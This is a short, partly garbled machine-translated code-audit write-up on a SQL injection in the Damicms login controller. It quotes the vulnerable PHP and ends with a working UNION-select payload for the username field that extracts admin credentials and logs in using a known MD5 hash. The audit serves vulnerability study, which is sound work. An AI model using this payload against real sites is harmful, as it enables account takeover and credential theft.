Code audit: Rice CMS Injection

Code audit: Rice CMS Injection
0x01 Preface

I just learned how to audit a few cms practitioners ....

 

1) Injection

1. Drilling prelude

After Damicms is set up locally, modify cms \ dami \ Core \ Lib \ Think \ Db. class. php and process the sq statement var_dump. [Common skills]

Then perform a black box test. The search point and the admin logon point are filtered out by entering single quotation marks...

When the registration function is available, it is found that the logon point does not filter single quotes...

2. Vulnerability principles

So I tried to read the code and found thinkphp could not understand --

After learning it, I came back ....

The logon point is dami \ Web \ Lib \ Action \ MemberAction. class. php.

In this controller

Error code:

<Font style = "color: rgb (34, 34, 34)"> <font face = ",, "> $ username = htmlspecialchars ($ _ REQUEST ['username']); $ userpwd = $ _ REQUEST ['userpwd']; if ($ username = ''| $ userpwd ='') {$ this-> error ('Enter the user name and password? '); Exit () ;}$ info = M ('member')-> where ("username =' {$ username} 'and is_lock = 0 ") -> find (); if (! $ Info) {$ this-> error ('user does not exist or login prohibited! ');} Else {if ($ info ['userpwd']! = Md5 ($ userpwd) {$ this-> error ('incorrect password. Please log on again! ');} Else {$ _ SESSION ['dami _ uid'] = $ info ['id']; $ _ SESSION ['dami _ username'] = $ info ['username']; if (! Empty ($ _ REQUEST ['lasturl']) {$ this-> assign ('jumpurl', urldecode (htmlspecialchars ($ _ REQUEST ['lasturl']);} else {$ this-> assign ('jumpurl', U ('Member/main');} $ this-> success ('login successful ~ ') ;}}</Font> </font>

I found that the username is not filtered and put in ...... Why does thinkphp not filter out data? Testing other points is enough. Finally, we found out.

If Thinkphp's where statement is used only for the sequence type, it will not filter = ...... It filters the objects in the array and the objects in the array .........

Programmers rely too much on thinkphp filtering, leading to vulnerabilities ......

3. payload

Because it is a login port injection, there is no way to display it ...... After thinking for a long time, we can provide this method: the user name at login:

-1' union select 1,(select concat(id,0x23,username,0x23,password) from dami_admin),'c4ca4238a0b923820dcc509a6f75849b',4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#

The password is 1.

After logging in, you can see that the user name is the injection.